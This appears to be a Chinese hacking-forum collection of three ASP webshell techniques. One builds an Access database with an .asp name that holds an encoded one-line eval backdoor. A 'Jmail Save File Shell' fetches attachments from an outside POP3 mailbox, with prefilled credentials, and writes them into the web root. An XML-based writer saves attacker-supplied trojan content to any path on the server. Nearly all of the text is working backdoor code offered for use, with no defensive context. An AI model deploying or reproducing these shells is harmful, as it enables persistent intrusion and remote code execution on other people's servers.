1. <%   
2. 'code by netpatch  
3. dim dbfile,sql   
4. db="netpatch.asp"  
5. dbfile=server.MapPath(db)   
6.  
7. set ydb=server.CreateObject("ADOX.Catalog")   
8. ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile   
9. set ydb=nothing   
10. if err.number=0 then   
11. Response.Write dbfile & " 创建成功<br> "   
12. else   
13. Response.Write "创建失败，原因： " & err.description   
14. Response.End   
15. end if   
16.  
17. Set Conn = Server.CreateObject("ADODB.Connection")   
18. Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & dbfile   
19.  
20. sql="CREATE TABLE fdata([data] Memo)"   
21. conn.execute(sql)   
22.  
23. Set rs = CreateObject("ADODB.RecordSet")   
24. rs.Open "FData", conn, 1, 3   
25. rs.addnew   
26. rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"   '(注释记得去掉！一句话后门 execute request(“n”))  
27. rs.update   
28.  
29.  
30. %>  
31.  
32. 用Jmail写文件进硬盘  
33.  
34.  
35.  
36. <%   
37.     'codz by kEvin1986 [S4T]  
38.     User=Request.Form("User")  
39.     Pass=Request.Form("Pass")  
40.     Popserver=Request.Form("Popserver")  
41.  
42.     if User<>"" and Pass<>"" and Popserver<>"" then  
43.         Set objmail = CreateObject( "JMail.POP3" )  
44.         objmail.Connect User, Pass, Popserver  
45.  
46.         set objmsg=CreateObject("jmail.message")  
47.         Set objmsg = objmail.Messages.item(1)   
48.         separator = ", "  
49.         response.write "Attachment Name is: " & SaveAtta & "<br>"  
50.         objmail.Disconnect  
51.     End if  
52.  
53.     Function SaveAtta()  
54.         Set Attachments = objmsg.Attachments  
55.         separator = ", "  
56.         response.write "The size of this Attachment is: " & objmsg.size & "<br>"  
57.         For i = 0 To Attachments.Count - 1  
58.         If i = Attachments.Count - 1 Then  
59.               separator = ""  
60.         End If  
61.  
62.         Set Theatta = Attachments(i)  
63.         response.write Theatta.Name   
64.         Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)  
65.         Response.write "Oh!Hey Guy.....That's OK!"  
66.         Next  
67.     End Function  
68. %>  
69.  
70. <Html>  
71. <Head>  
72. <Title>Jmail Save File Shell</Title>  
73. </Head>  
74. <Body>  
75. <Center>  
76. <Form Method="POST">  
77. User: <input name="User" type=text value="kevin1986"><br>  
78. Pass: <input name="Pass" type=text value="1986lovinghuan"><br>  
79. POP3: <input name="Popserver" type=text value="pop.163.com"><br>  
80. <input type=submit value="Get the Attachments Of the First Mail">  
81. </Form>  
82. </Center>  
83. </Body>  
84. </Html>   
85.  
86. 利用xml写马  
87.  
88.  
89. <%on error resume next%>  
90. <form id="form1" name="form1" method="post" action=''''>  
91. <p>木马内容</p>  
92. <p><textarea name="flashboy" cols="80" rows="10"></textarea></p>  
93. <p>路径</p>    
94. <p><input name="textfield" type="text" size="50" /></p>  
95. <p><input type="submit" name="Submit" value="提交" /></p></form>  
96. <p><%Response.write "本文件绝对路径"%>  
97.   <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p>  
98. <%  
99. dim xmlString  
100. dim xmlDoc  
101. xmlString= Request("flashboy")  
102. set xmlDoc = server.createObject("Msxml2.DOMDocument")  
103. xmlDoc.loadXml(xmlString)  
104. f=Request("textfield")  
105. xmlDoc.save(f)  
106. set xmlDoc=nothing  
107. %>